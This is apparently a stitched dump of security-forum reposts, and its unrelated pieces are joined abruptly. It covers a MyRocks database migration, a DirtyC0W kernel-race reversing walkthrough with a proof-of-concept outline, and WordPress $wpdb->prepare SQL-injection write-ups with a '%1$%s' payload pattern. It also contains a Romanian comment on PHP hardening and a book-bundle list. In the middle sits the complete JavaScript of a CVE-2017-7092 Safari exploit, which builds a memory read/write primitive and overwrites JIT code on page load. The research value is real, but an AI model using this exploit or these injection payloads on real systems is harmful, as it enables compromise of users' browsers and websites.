- Consistency check across two instances. This compared primary key row counts and checksums across two different instances (MyRocks and InnoDB) within the same replica set (master-slave pairs). With GTID, it is possible to start transactions with a consistent snapshot at the same GTID on both instances. The select statements that follow (returning row counts and checksums) should then be consistent between instances.
- Shadow query correctness check across two instances. MySQL has a feature called Audit Plugin to capture executed queries. We created a tool to shadow (replay) captured queries to multiple instances and compare results. This made sure that production queries were seeing exactly the same results between InnoDB and MyRocks.
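The post doesn't include the tooling itself, but the first check can be approximated with a query that reduces an index scan to a (row count, checksum) pair and compares the two access paths. A rough sketch, assuming a pymysql-style driver and the t1/id/value1 schema from the example above (host, user and index names are placeholders):

    import pymysql  # assumed MySQL driver; any DB-API client would work the same way

    # Reduce a full scan over one index to a (row_count, checksum) fingerprint.
    QUERY = ("SELECT COUNT(*), BIT_XOR(CRC32(CONCAT_WS('#', id, value1))) "
             "FROM t1 FORCE INDEX (%s)")

    def index_fingerprint(conn, index_name):
        with conn.cursor() as cur:
            cur.execute(QUERY % index_name)  # index names cannot be bound parameters
            return cur.fetchone()

    conn = pymysql.connect(host="myrocks-host", user="checker", password="...", database="test")
    primary = index_fingerprint(conn, "PRIMARY")
    secondary = index_fingerprint(conn, "idx_value1")  # assumed name of the (value1) index
    print("match" if primary == secondary else "MISMATCH: %r vs %r" % (primary, secondary))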
Migration steps

We used the following process to migrate from InnoDB to MyRocks. The fact that InnoDB and MyRocks could replicate from each other made the migration a lot easier.

1. Deployed the first MyRocks slave. We had one master and four slaves for each replica set, across worldwide regions. For each replica set, we created a first MyRocks instance by dumping from InnoDB (mysqldump) in the same region, then loading into MyRocks (mysql with bulk data loading and fast index creation). We stopped replication on the source InnoDB slave instances during dump and load to make the migration fast and easier. During dump and load, all read requests went to the other available slave InnoDB instances. Since MyRocks was optimized for data loading and secondary index creation, dump and load did not take much time (it could copy hundreds of GBs of InnoDB data per hour). After catching up on replication and verifying consistency, we deleted the InnoDB instance in the same region.
2. Deployed the second MyRocks slave. We wanted to avoid operating with a single MyRocks instance, since losing that instance would require us to dump and load again. By operating with two MyRocks instances, recovering from a single instance failure could be done by online binary MyRocks copy (myrocks_hotbackup), which was much more lightweight than dump and load. Prior to MyRocks deployment, we had five InnoDB instances per replica set. We added two MyRocks instances, followed by deleting two InnoDB instances in the same region. This resulted in three InnoDB and two MyRocks instances for each replica set. Since MyRocks was faster for data loading, loading into MyRocks was much easier than copying to InnoDB. This allowed us to migrate without increasing the number of physical servers in use, even during migration.
3. Promoted a MyRocks slave to master. Deploying a master was much more difficult than deploying slaves because a master instance serves writes as well as reads. For example, on a master, concurrent writes to the same rows happen, so proper row lock handling has to be implemented. A poor concurrency implementation will cause lots of errors and stalls.
4. Copied MyRocks to all regions, deleted all InnoDB instances. The last step was copying MyRocks to all regions and removing InnoDB. Finally the replica set was fully migrated from InnoDB to MyRocks.

In production, we did the first two steps for all UDB replica sets. We then proceeded to the third step for many replica sets, and finally to the last step. Since master deployment was the hardest part, we did lots of testing before moving forward. We extended our shadow query testing tool to cover master traffic testing, so that we could fix any concurrency bugs before deploying a master in production.

Other technical tips

While we used direct I/O in InnoDB, MyRocks/RocksDB had limited support for direct I/O, so we switched to buffered I/O. Older Linux kernels had known issues where heavy buffered I/O usage caused swap and virtual memory allocation stalls. Our Linux kernel team at Facebook fixed the vm allocation stalls in Linux 4.6, and we upgraded the kernel to v4.6 prior to the migration.

We also run multiple MySQL instances per machine. Each instance size was much smaller than the 5TB flash storage capacity, which helped improve database operations like backups, restores and creating replicas, and helped prevent replication lag.

During migrations, we gradually created MyRocks instances, followed by deleting InnoDB instances. On Flash storage, aggressive file deletions caused long TRIM stalls, which might take seconds to tens of seconds. We were aware of the restrictions and created a simple tool to delete files slowly in tiny chunks. Instead of deleting 100GB InnoDB data files with the "rm" command, the tool divided large files into multiple ~64MB chunks, then deleted each chunk with short sleeps. We slowed down the deletion speed to around 128MB per second.

Lessons learned

Efficiency is important to our operations. Having completed the migration quickly and without causing production problems made us really happy. During the course of developing MyRocks and migrating to it, we learned several important lessons.

Estimated migration time should be one of the main criteria in choosing hardware technology. For example, taking five years to complete a migration instead of one year can lower the impact on storage savings, because you would have to continue to purchase new hardware before the migration was done.

Automating and simplifying tests also helped make the migration easier, including:

- Sending shadow production read/write traffic and monitoring for regressions (especially the number of errors, stalls and latency)
- Checking InnoDB and MyRocks data consistency
- Intentionally crashing MyRocks slave and master instances and verifying that they could recover

Understand how the target service is used. It was important for us to decide which features to add to MyRocks with higher priority. We added several important features to make the migration easier, such as detecting queries using Gap Locks, Bulk Loading, and the Read Committed isolation level. Prioritizing features properly will help you migrate more easily and quickly. But to do that, you need to know how the service works.

Start small. Ideally, new software should first be deployed on a very small, read-only instance, where it can be rolled back as needed. Switching an entire service via config file and hoping it will work is not what Production Engineers (Site Reliability Engineers) should do.

MyRocks is open source software, which allows us to work with others to create features and find and fix bugs.

Future plans

Replacing InnoDB with MyRocks in our main database helped us reduce our storage usage by half.
We are continuing to make MyRocks and RocksDB more efficient, including consolidating instances more aggressively to free up machines for other purposes. We are also working on cross-engine support. MyRocks is optimized for space savings and reducing write amplification, while InnoDB is more optimized for reads and has more niche features such as gap locking, foreign keys, fulltext indexes, and spatial indexes. Our current MyRocks development does not implement many niche features, but we plan to support multiple engines reliably. Running both InnoDB and MyRocks in the same instance will allow people to use InnoDB for small, read-intensive tables, and MyRocks for everything else, which is a common feature request from our external community. Finally, we will work to support MyRocks in the upcoming MySQL 8.0.

Source: https://code.facebook.com/posts/1478526992216557/migrating-a-database-from-innodb-to-myrocks/
-
Reversing DirtyC0W
Date: Mon, 25 Sep 2017
By: fred
Tags: reverse engineering / kernel / race-condition / reven

Everybody keeps in mind the Dirtyc0w Linux kernel bug. For those who don't, take some time to refresh your memory here. The kernel race condition is triggered from user-space and can easily let a random local user write into any root-owned file. In this article, we will demonstrate how REVEN can help reverse engineering a kernel bug such as Dirtyc0w. Our starting point will be a REVEN scenario recording of an occurrence of the bug, together with the corresponding execution trace generated by REVEN. From that point on, we will:

- have a look at the POC that was used to trigger the bug
- find an interesting point to start the analysis
- time-travel and follow the data-flow backward to understand where it comes from
- find the location in the trace where the race condition occurs
- distinguish unique code paths vs multiple instances
- find the matching Linux kernel source code and derive the missing semantics
- conclude

The REVEN technology used throughout the article has been designed by Tetrane to perform deterministic analysis of whole running systems at the CPU, memory and device level. Its implementation comprises a REVEN server together with the Axion client GUI. One can also interact with the REVEN server through the REVEN Python API, from Python or third-party tools such as IDA Pro, Kd/Windbg, GDB, Wireshark, etc.

The exploit POC we'll use

You can find the source code of the Dirtyc0w POC I've used here. In short, the big picture is:

void print_head_target_file(const char* filename){
    //print the file content
}

void *madviseThread(void *arg){
    for()
        // always says we don't need the mapped area
        madvise(map,100,MADV_DONTNEED);
}

void *procselfmemThread(void *arg){
    int f=open("/proc/self/mem",O_RDWR);
    for()
        // always tries to write into the mmaped file through the process virtual address interface
        lseek(f,(uintptr_t) map,SEEK_SET);
        write(f,str,strlen(str));
}

int main(){
    print_head_target_file(target_filename);
    f=open(target_filename,O_RDONLY);
    //MAP_PRIVATE => will trigger the Copy On Write (COW)
    map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
    run_the_2_looping_threads
    close(f);
    print_head_target_file(target_filename);
    return 0;
}

In this article and in the screenshots of Axion below, the madviseThread will be displayed in blue, and the procselfmemThread will be displayed in magenta.

Looking for some point to start in the trace

First, let's have a look at the framebuffer at the beginning of the trace. To do this, we use the timeline widget at the bottom of the screen in Axion, placing the red dot (current position) at the far left. The framebuffer (Menu Windows->Views->Framebuffer) is quite empty. Now at the end (red dot at the far right), we see that the content of the file /etc/issue.net is modified: from "Debian GNU/Linux 8" at the beginning, it becomes "_TETRANE_REVEN_DIRT" at the end. So, the recorded scenario and the trace generated by the REVEN simulator successfully captured the race condition that overwrites, from a standard user account, some root-only writable file.

Following the data flow backward (time-travel)

We now want to track the string "_TETRANE_REVEN_DIRT" backward in the trace. To do so, we open the REVEN-Axion Strings widget (Menu Windows->Views->Strings or shortcut alt-s), and look at the string history. We select the first string access (timestamp #3719945_0), which brings us to the related location in the recorded trace.
From the Backtrace widget and the timeline, we derive that this location displays the content of the file at the end of the trace (print_head_target_file() and red dot in timeline). So we look at the input buffer (ds:[esi]) (see the tooltip when selecting the parameter). It opens a memory dump widget for this pointer, at this trace location. We select the first byte and look at the data history (REVEN-Axion has a database of every memory access for the whole trace). We see that the physical memory pointed to by this virtual address (0x7b:0xd49bb000) is only accessed a few times. First accesses come from a hardware peripheral ("PCI direct access" at early timestamp #13655_2).

We select the first write in the Data History widget, which brings us to the related trace location. We can see that the write is the first access to disk to read the file (see that the content is "Debian GNU/Linux 8"). The main process was waiting for this IO and scheduled an idling process. But the current topic is not about asynchronous IO in Linux (even though it is very interesting in fact!), let's keep it for another time ;).

Find the race condition location in the trace

So we know we have here the file kernel cache buffer, located at 0x7b:0xd49bb000. And we see that we're writing into it at sequence #2590141_0 in the trace. Let's go there. We see (yellow in the dump) that the current instruction is changing data in our beloved buffer. We can check with the before/after buttons in the Memory dump that we are overwriting the buffer content for the first time. On the left, in the Hierarchical trace, we see that there is a __schedule from madviseThread a few timestamps before. At the bottom of the screen, in the timeline, we see the current location (red dot) and we see that we've just resumed the magenta thread.

If we go back to where the thread was interrupted, we can see the full backtrace. Axion makes it easy: from the current sequence point, scroll up, find the end of __get_user_pages (#2590124). Pressing '%' automatically finds the matching "call" of the selected "ret". It brings us to sequence #1148384 (before the magenta thread was scheduled out). Here we have the complete backtrace: procselfmemThread->write->mem_write->mem_rw->access_remote_vm->__access_remote_vm

Let's go back to sequence #2590141 (WRITE point). We want to trace back edi to know where the "faulty" pointer comes from. To avoid overtainting (edi also depends on ecx because of the "rep" prefix), scroll up to #2590140_7 and select eax. Clicking the Taint button and Backward in the Data Painter pane highlights the backward taint in the trace, which contains too many things when we scroll up a little. So, from the same start point, we use the Tainter Graph instead (Windows->Miscellaneous->Tainter Graph), which helps to interactively follow the data and discard pointer paths. Following the data, we go to sequence #258998_0, the last "recent" point before jumping to #11661_0 (which is in the initial read() that loads data from disk, as seen before). #258998_0 is in filemap_map_pages; the backtrace is: __get_user_pages->handle_mm_fault->do_read_fault->filemap_map_pages. BTW, we find our RED tainted data flow again.

Unique vs multiple instances

Searching for this eip address (0xc10e31d0) in the trace, we see we only went there once in the whole trace (see the search widget at the bottom of the screen; search results are shown as vertical bars in the timeline). The same search for do_read_fault (0xc1105040) returns only one occurrence in the trace.
The same search for handle_mm_fault (0xc110561d) returns 4020 occurrences in the trace. -> cool, it seems a test in there is the cause of the unique behavior we're investigating \o/

We search for the conditional jump that is only taken once:

- search 0xc110572a: 3 results
- 0xc1105720: idem
- 0xc110570b: idem
- 0xc11056f8: idem
- 0xc1105678: 4020 times

-> the condition we're looking for is at #2589960_9:

0xc1105698 je 0xc11056f8 ($+94)

and the test is just before:

0xc1105692 and ebx, 0x101

So we taint this ebx for backward analysis (see the green track). It is straightforward: in the Data Painter widget, green track, click on the Min point #1149154_2, which will time-travel to where the taint becomes empty. In the assembly view, we see our tainted memory is set to zero at #1149154_3, so the tainter successfully brought us to the right position in time. At this point we are in the blue thread, at the very beginning of the thread; the backtrace is: madviseThread->syscall->zap_page_range->unmap_single_vma

We've found that in the magenta thread, a piece of data (at 0x7b:0xde413e50) is written then read. Between the write and the read, the blue thread has overwritten this data at #1149154_3. The data was used by the following instruction, which leads to a conditional jump: should we use the copied buffer (normal case) or the original one (i.e. the real file cache)?

0xc1105692 and ebx, 0x101

So, if we sum up what we have:

- By the end of the trace we display the content of the file. This content comes directly from the file-cache buffer.
- Thanks to the data-access history, we directly see where this data was written in the magenta thread (the one that always tries to write the read-only file).
- It was just after an interruption by the blue thread (the thread that always says we can un-map the virtual address range that maps the read-only file).
- We quickly identify which portion of code is executed only for the 'faulty' write.
- We identify the condition in the code that causes the execution flow to go down this path.
- We track back the checked data and see it was written by the blue thread, so we have identified the "race condition": some data is written in one thread and leads the other thread to a bug.

Match with Linux sources

(Please note that this is easy to show live, but trickier to explain in screenshots/text. This article is already too long, so here is the fast summary.)

We use the REVEN static vision of the dynamic execution to see statically what was executed around our interesting code:

0xc1105692 and ebx, 0x101
0xc1105698 je 0xc11056f8 ($+94)

A cool feature is that when you move your mouse over the trace, the graph highlights its related blocks, so you can interactively follow the dynamic code under your mouse in the static view. In this view, only code that is executed at least once in the trace is displayed, so you are not polluted by code you don't want to see. Now, a very quick comparison of Linux source code (some greps with symbols found in the static graph) and the executed binaries makes us discover the matching line in Linux => mm/memory.c:3199

if (!pte_present(entry))

which expands to (pte_flags(entry) & (_PAGE_PRESENT | _PAGE_PROTNONE)). And browsing the Linux sources, we see _PAGE_PRESENT=0x1, _PAGE_PROTNONE=0x100, hence the 0x101 in the assembly.
(A lot of functions are inlined, so the matching requires some Linux kernel habits.)

3191 static int handle_pte_fault(struct mm_struct *mm,
3192                 struct vm_area_struct *vma, unsigned long address,
3193                 pte_t *pte, pmd_t *pmd, unsigned int flags)
3194 {
3195         pte_t entry;
3196         spinlock_t *ptl;
3197
3198         entry = *pte;
3199         if (!pte_present(entry)) {
3200                 if (pte_none(entry)) {
3201                         if (vma->vm_ops)
3202                                 return do_linear_fault(mm, vma, address,
3203                                                 pte, pmd, flags, entry);
3204
3205                         return do_anonymous_page(mm, vma, address,
3206                                                 pte, pmd, flags);
3207                 }
3208                 if (pte_file(entry))
3209                         return do_nonlinear_fault(mm, vma, address,
3210                                         pte, pmd, flags, entry);
3211                 return do_swap_page(mm, vma, address,
3212                                         pte, pmd, flags, entry);
3213         }
3214
3215         if (pte_numa(entry))
3216                 return do_numa_page(mm, vma, address, entry, pte, pmd);
3217
3218         ptl = pte_lockptr(mm, pmd);
3219         spin_lock(ptl);
3220         if (unlikely(!pte_same(*pte, entry)))
3221                 goto unlock;
3222         if (flags & FAULT_FLAG_WRITE) {
3223                 if (!pte_write(entry))
3224                         return do_wp_page(mm, vma, address,
3225                                         pte, pmd, ptl, entry);
3226                 entry = pte_mkdirty(entry);
3227         }

In REVEN, we have tainted ebx backward and seen that it is reset by madvise(), which overrides the value initially set by the first do_cow_fault. The flags value was 0x65 then. With 0x65 instead of 0x0, the ebx & 0x101 (i.e. pte_present(entry)) would have returned true, and we would have taken the do_wp_page() path (write-protection fault, which would have copied the page as usual) instead of do_linear_fault() (which gives access to the page containing the file cache buffer). Now we have the full vision of the kernel bug exploited by the user-space POC.

Conclusion

Using REVEN and the Axion GUI on a kernel race-condition case has proven to be quite useful, as its non-intrusive way of working doesn't alter the analyzed system's behavior. It allows an analyst to quickly browse the execution trace from the end to the beginning (time-travel and backward analysis). Thanks to Axion's unique features, the analyst can then find points of interest and understand what is going on. Using REVEN and Axion, an experienced user with strong low-level skills can reverse such a trace in about 7 minutes.

Source: http://blog.tetrane.com/2017/09/dirtyc0w-1.html
-
<html> <head> <script> // b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218 big_array = []; debug = 0; arr = []; evil_buffer = {}; bigarray_buffer_index = 0; buffer_arr_index = 0; function_to_shellcode = {} function log(txt) { var c = document.createElement("div"); c.innerHTML = "log: " + txt; d.appendChild(c); } function debug_alert(str){ if(debug){ alert(str); log(str); } } function gc() { debug_alert("gc"); for(i = 0;i < 0x924924;i++){ //0x4924924 arr[i] = new ArrayBuffer(20); //54 } debug_alert("gcc"); } function gc2() { try { var c = document.createElement("canvas"); var gl = c.getContext("2d"); for (var i = 0; i < 100; i++) { var gggg = gl.createImageData(1, 0x10000/4) } } catch (e) { } } function make_a_big_hole(){ g = [] gg = "g".repeat(0x7fff1000) debug_alert("big_hole"); for(var i = 0; i < 5;i++){ g[i] = String.prototype.fontsize.call(gg,5); } debug_alert("after_big_hole"); for(var i = 0; i < 0x3;i++){ g[0] = null; //gc //g[1] = null; g[2] = null; //".replace g[3] = null; //hole } //g = null; debug_alert("big_array"); init_big_array_len = 0x10000000; g[2] = new Array(init_big_array_len); g[2].fill(1.1); debug_alert("after_big_array"); big_array = g[2]; //evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0)); //arr2 = []; arr2[0] = evil_float64; //heap_feng_shui(); gg = null; gc(); } function make_evil_data(){ nop = "\x00" nop_data = "" offset = 0x38 + 0x1e +0x38 nop_data = nop.repeat(offset/2); //nop_data = nop_data + "\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff" nop_data = nop_data + unescape("%uffff%uffff%uffff%uffff") + "\x00\x00\x00\x00" + unescape("%uffff%uffff%uffff%uffff"); ff = "\x00" ff_data = ff.repeat((0x1000-offset-0x18)/2); return nop_data + ff_data; } function heap_feng_shui(){ debug_alert("heap_feng_shui"); arr2 = [] buffer_arr = [] /* for(var i = 0;i < 20;i++){ //arr2[i] = new Array(0x1000); buffer_arr[i] = new Float64Array(0x2000001); // buffer_arr[i].fill(1.1); //float64 1.1 == array 1.0375 }*/ for(var i = 0;i < 0x18000;i++){ evil_float64 = new Float64Array(new ArrayBuffer(0x8000)); evil_float64.fill(1.1); buffer_arr[i] = evil_float64; } debug_alert("after_heap_feng_shui"); } function f64tou32(number){ a = new Float64Array(0x8); a.fill(number); b = new Uint32Array(a.buffer); result = []; result[0] = b[0]; result[1] = b[1]; return result; } function u32tof64(arr){ b = new Uint32Array(0x8); b[1] = arr[1]; b[0] = arr[0]; a = new Float64Array(b.buffer); return a[0]; } function read_obj(obj){ big_array[bigarray_buffer_index] = obj; f64_address = buffer_arr[buffer_arr_index][0x50/8]; uint32 = f64tou32(f64_address); // alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); return uint32; //alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); } function fake_obj(arr_address){ f64_address = u32tof64(arr_address); // alert(f64_address); buffer_arr[buffer_arr_index][0x50/8] = f64_address; // alert("here"); return big_array[bigarray_buffer_index]; } function randomString(){ chars = "abcdefghijklmnopq"; maxPos = chars.length; result = ""; for(i = 0;i < 0x8;i++){ result += chars.charAt(Math.floor(Math.random() * maxPos)); } return result; } function sprayFloat64ArrayStru(){ for(var i = 0; i < 0x1000;i++){ var a = new Float64Array(1); a[randomString()] = 1337; } } function Int64(arr){ uint32 = []; uint32[0] = arr[0]; uint32[1] = arr[1] - 0x10000; f = u32tof64(uint32); return f; } function Int64_add(arr,num){ arr[0] = arr[0] + num; return arr; } function read_64(addr){ f = u32tof64(addr); fakearray[0x2] = f; result = []; result[0] = 
evil_buffer_array[0]; result[1] = evil_buffer_array[1]; //alert(result[1].toString(16)+ " " + result[0].toString(16)); return result; } function write_32(addr,data){ f = u32tof64(addr); fakearray[0x2] = f; evil_buffer_array[0] = data; } function make_jit_function(){ func_body = "eval('');abc = [];" for(i = 0;i<500;i++){ func_body += "abc[" + i.toString() + "];" } function_to_shellcode = new Function("a",func_body); // alert("here") for(i = 0;i < 100; i++){ function_to_shellcode(); } // alert("here") } function trigger() { //alert(2); // make_jit_function(); evil_data = make_evil_data(); a = evil_data.repeat(0x7fff0000/0x800); z = a.slice(1); x = "\"".repeat(0x2aaaaaa0); //alert("1"); // alert(evil_data.length.toString(16)); make_a_big_hole(); z = String.prototype.link.call(a,x) alert("The Array length is 0x" + big_array.length.toString(16)); heap_feng_shui(); //z = null; //a = null; //x = null; // heap_feng_shui(); //alert("end"); //Array.prototype.slice.call(arr,1); //Array.prototype.slice.call(buffer_arr,1); t = Array.prototype.slice.call(big_array,0x10000001,0x10000002); t = Array.prototype.slice.call(buffer_arr,1,2); if(big_array.length != init_big_array_len){ // alert("Success!The Array length is 0x" + big_array.length.toString(16)); // alert(big_array[0x1]); /*for(var i = 0x10000000;i < big_array.length;i++){ if(big_array[i] != undefined && big_array[i] != -1){ alert(i.toString(16)); alert(big_array[i]); } }*/ flag = 0; for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){ //0x4a000000 //alert(i.toString(16)); if(big_array[i] == 1.0375){ alert("find Success"); bigarray_buffer_index = i; big_array[bigarray_buffer_index] = 3.3333333; j = 0; while(j<0x18000){ if(buffer_arr[j][0x50/8] != 1.1){ buffer_arr_index = j; flag = 1; break; } j++; } break; } } if(flag == 0){ alert("can't find buffer!"); window.location.reload(); } } else{ alert("can't overwrite the length!"); window.location.reload(); } //alert(buffer_arr_index); make_jit_function(); sprayFloat64ArrayStru(); evil_buffer_array = new Uint32Array(0x1000); var jsCellHeader = Int64([0x00001000,0x11827000]); var lengthFlags = Int64([0x00000010,0x00010000]); var container = { jsCell : jsCellHeader, butterfly : false, vector : evil_buffer_array, lengthAndFlags : lengthFlags }; address = Int64_add(read_obj(container),0x10); //alert(address[1].toString(16) + " " + address[0].toString(16)); fakearray = fake_obj(address); //String.prototype.link.call(container); while(!(fakearray instanceof Float64Array)){ i = 1; jsCellHeader = Int64([0x00001000+i,0x11827000]); container.jsCell = jsCellHeader; i++; } //String.prototype.link.call(fakearray); func_addr = read_obj(function_to_shellcode); // alert(func_addr[1].toString(16)+ " " + func_addr[0].toString(16)); executableAddr = read_64(Int64_add(func_addr,0x18)); jitCodeAddr = read_64(Int64_add(executableAddr,0x18)); codeAddr = read_64(Int64_add(jitCodeAddr,0x20)); write_32(codeAddr,0xcccccccc); //codeAddr = read_64(Int64_add(jitCodeAddr,0x10)); //write_32(codeAddr,0xcccccccc); alert("begin_shellcode!!!!!!"); function_to_shellcode(); alert("end"); } </script> </head> <body onload="trigger()"> <pre id="d"> </pre> </body> </html> Sursa: https://github.com/xuechiyaobai/CVE-2017-7092-Exploit
-
Yes, interesting, big words... "We're kind of killing it by filtering the $, |, ;, ` and & chars in our default configuration, making it a lot harder for an attacker to inject arbitrary commands." -> And what if those characters are used deliberately by the developer? The module can cause problems. At the end of the day, you can't really "kill a bug class" as long as the language itself allows that bug class. For example, in Java, to run a system process with "ProcessBuilder" you have to pass it a List<String>, i.e. an array where the first element is the command (e.g. ls, cat etc.) and every following element is an argument. It doesn't matter whether an argument contains spaces or special characters, it is still treated as a single argument, which gives you a sort of "prepared statements" for process execution (a minimal C analogue is sketched below). "The goto payload for XSS is often to steal cookies. Like Suhosin, we are encrypting the cookies with a secret key, the IP of the user and its user-agent. This means that an attacker with an XSS won't be able to use the stolen cookie, since he (often) can't spoof the IP address of the user." -> Does it really do more than """encryption""", which is a big word if all that goes into it is the IP address and the user-agent, or does it also verify the IP address on the server side? "This feature can't be deployed on websites that already stored serialized objects (ie. in database)" -> I think that is unfortunately the most common case. The approach is interesting: you install a module and your problems are gone. But for obvious reasons it is not, and never will be, enough. The problem starts higher up: if you let a user do whatever they want and don't force them to write secure code, you will have problems.
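A minimal C analogue of the ProcessBuilder point above (hypothetical example, /bin/echo used as a stand-in target): because the arguments go straight into an argv array and no shell is involved, the metacharacters stay plain data.

#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    /* user-controlled value containing shell metacharacters */
    char *user_arg = "foo; rm -rf / | $(evil)";

    pid_t pid = fork();
    if (pid == 0) {
        /* no /bin/sh involved: user_arg is delivered to echo verbatim, as one argument */
        char *argv[] = { "echo", user_arg, NULL };
        execvp("/bin/echo", argv);
        perror("execvp");
        return 1;
    }
    waitpid(pid, NULL, 0);
    return 0;
}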
-
The Humble Book Bundle: Hacking Reloaded presented by No Starch Press
Nytro replied to yukti's topic in Stiri securitate
Pay $1 (about €0.84) or more! Game Hacking Nick Cano The Car Hacker's Handbook Craig Smith The Smart Girl's Guide to Privacy Violet Blue Metasploit David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni 35% off Print Books from nostarch.com Pay $8 (about €6.69) or more to also unlock! Penetration Testing Georgia Weidman iOS Application Security David Thiel Android Security Internals Nikolay Elenkov The Book of PF Third Edition Peter N. M. Hansteen Practical Forensic Imaging Bruce Nikkel Pay $15 (about €12.54) or more to also unlock! The Book of PoC || GTFO Manul Laphroaig New Bestseller! Hacking Second Edition Jon Erickson The IDA Pro Book Second Edition Chris Eagle The Practice of Network Security Monitoring Richard Bejtlich Absolute OpenBSD Second Edition Michael W. Lucas Practical Packet Analysis Third Edition Chris Sanders -
slavco Aug 23 Wordpress SQLi There won’t be an intro, let us jump to the problem. This is the wordpress database abstraction prepare method code: public function prepare( $query, $args ) { if ( is_null( $query ) ) return; // This is not meant to be foolproof — but it will catch obviously incorrect usage. if ( strpos( $query, ‘%’ ) === false ) { _doing_it_wrong( ‘wpdb::prepare’, sprintf( __( ‘The query argument of %s must have a placeholder.’ ), ‘wpdb::prepare()’ ), ‘3.9.0’ ); } $args = func_get_args(); array_shift( $args ); // If args were passed as an array (as in vsprintf), move them up if ( isset( $args[0] ) && is_array($args[0]) ) $args = $args[0]; $query = str_replace( “‘%s’”, ‘%s’, $query ); // in case someone mistakenly already singlequoted it $query = str_replace( ‘“%s”’, ‘%s’, $query ); // doublequote unquoting $query = preg_replace( ‘|(?<!%)%f|’ , ‘%F’, $query ); // Force floats to be locale unaware $query = preg_replace( ‘|(?<!%)%s|’, “‘%s’”, $query ); // quote the strings, avoiding escaped strings like %%s array_walk( $args, array( $this, ‘escape_by_ref’ ) ); return @vsprintf( $query, $args ); } From the code there are 2 interesting unsafe PHP practices that could guide towards huge vulnerabilities towards wordpress system. Before we jump to the SQLi case I’ll cover another issue. This issue is rised from following functionality: if ( isset( $args[0] ) && is_array($args[0]) ) $args = $args[0]; This means that if you have something like this: $wpdb->prepare($sql, $input_param1, $sanitized_param2, $sanitized_param3); then if you control the $input_param1 e.g. is part of the $input_param1 = $_REQUEST[“input”], this means that you can add your own values for the remaining parameters. This could mean nothing in some cases, but in some cases could easy lead to RCE having on mind nature and architecture of the wp itself. SQLi vulnerability In order to achieve SQLi in wp framework based on this prepare method we must know how core PHP function of this method works. It is vspritf which is in fact sprintf. This means that $query is format string and $args are parameters => directives in the format string define how the args will be placed in the format string e.g. query. Very, very important feature of sprintf are swapping arguments :) As extra there we have the following lines of code: $query = str_replace( “‘%s’”, ‘%s’, $query ); // in case someone mistakenly already singlequoted it $query = str_replace( ‘“%s”’, ‘%s’, $query ); // doublequote unquoting $query = preg_replace( '|(?<!%)%f|' , '%F', $query ); // Force floats to be locale unaware $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s e.g. will replace any %s into '%s'. From everything above we got following conclusion: If we are able to put into $query some string that will hold %1$%s then we can salute our SQLi => after prepare method is called then we will have an extra 'into query, because %1$%s will become %1$'%s' and after sprintf will become $arg[1]'. For now this is just theory and most probably improper usage of the prepare method, but if we find something interesting in the wp core than nobody could blame the lousy developers who don’t follow coding standards and recomendations from the API docs. Most interesting function is delete_metadata function and this function perform the desired actions from description above and when it is called with all of the 5 parameters set and $meta_value != “” and $delete_all = true; then we have our working POC e.g. 
if ( $delete_all ) { $value_clause = ‘’; if ( ‘’ !== $meta_value && null !== $meta_value && false !== $meta_value ) { $value_clause = $wpdb->prepare( “ AND meta_value = %s”, $meta_value ); } $object_ids = $wpdb->get_col( $wpdb->prepare( “SELECT $type_column FROM $table WHERE meta_key = %s $value_clause”, $meta_key ) ); } $value_clause will hold our input, but we need to be sure $meta_value already exists in the DB in order this SQLi vulnerable snippet is executed — remember this one. This delete_metadata function called with desired number of parameters is called in wp_delete_attachment function and this function is called in wp-admin/upload.php where $post_id_del input is value taken directly from $_REQUEST. Let us check the wp_delete_attachment function and its constraints before we reach the desired line e.g. delete_metadata( ‘post’, null, ‘_thumbnail_id’, $post_id, true );. The only obstacle that prevents this code to be executed is the following: if ( !$post = $wpdb->get_row( $wpdb->prepare(“SELECT * FROM $wpdb->posts WHERE ID = %d”, $post_id) ) ) return $post; but again due the nature of sprintf and %d directive we have bypass => attachment_post_id %1$%s your sql payload. Here I’ll stop for today (see you tomorrow with part 2: https://medium.com/websec/wordpress-sqli-poc-f1827c20bf8e), because in order authenticated user that have permission to create posts to execute successful SQLi attack need to insert the attachment_post_id %1$%s your sql payload as _thumbnail_id meta value. Fast fix for this use case (if you allow `author` or bigger role to your wp setup): At the top of the wp_delete_attachment function, right after global $wpdb; add the following line: $post_id = (int) $post_id; Impact for the wp eco system This unsafe method have quite huge impact towards wp eco system. There are affected plugins. Some of them already were informed and patched their issues, some of them put credits, some not. Another ones have pushed `silent` patches, but no one cares regarding safety of all. In the next writings of this topic I’ll release most common places/practices where issues like this ones occurs and will release the vulnerable core methods beside pointed one, so everyone can help this issue being solved. Responsible disclosure This approach is more than responsible disclosure and I’ll reffer to the paragraph for the impact and this H1 report https://hackerone.com/reports/179920 Promo If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only). Sursa: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
-
On WordPress Security and Contributing …and how neither really worked today. A sad story in two parts, where I’m rash, harsh and untactful. An explanation, a rant, a call for support, a call for action. You do not have to agree with me, I may be just an asshole and haven’t realized it yet Part 1: The %1$%s vulnerability This post will overview two issues that have hit me where it hurts with the recent WordPress 4.8.2 release. A handful of issues were addressed, among which a vulnerability in $wpdb->prepare which was fully disclosed 4 weeks ago here. But let’s start from the very beginning. A very long time ago a bad decision was made. wpdb->prepare was born which was based on sprintf functionality. The Codex states that the method provides “sprintf-like” functionality but only supports %d, %s and %f placeholders. Cool. As time went on, people figured out that numbered placeholders also work in this function and it was used at liberty, all over the place. Yoast SEO used, some Automattic internal code used, as well as a crapton of other instances of usage from GitHub’s search: https://github.com/search?q=wpdb->prepare+%1%24s&type=Code&utf8=✓ What they didn’t know is that numbered placeholders are not safe to use. First and foremost, numbered placeholders were not escaped. So $wpdb->prepare( 'SELECT * FROM wp_posts WHERE post_ID = %1$s', '1 OR 1 = 1' ); would actually yield a SQL injection, as the placeholder is not quoted it would result in SELECT * FROM wp_posts WHERE post_ID = 1 OR 1 = 1;. Classic. The developers who figured this out 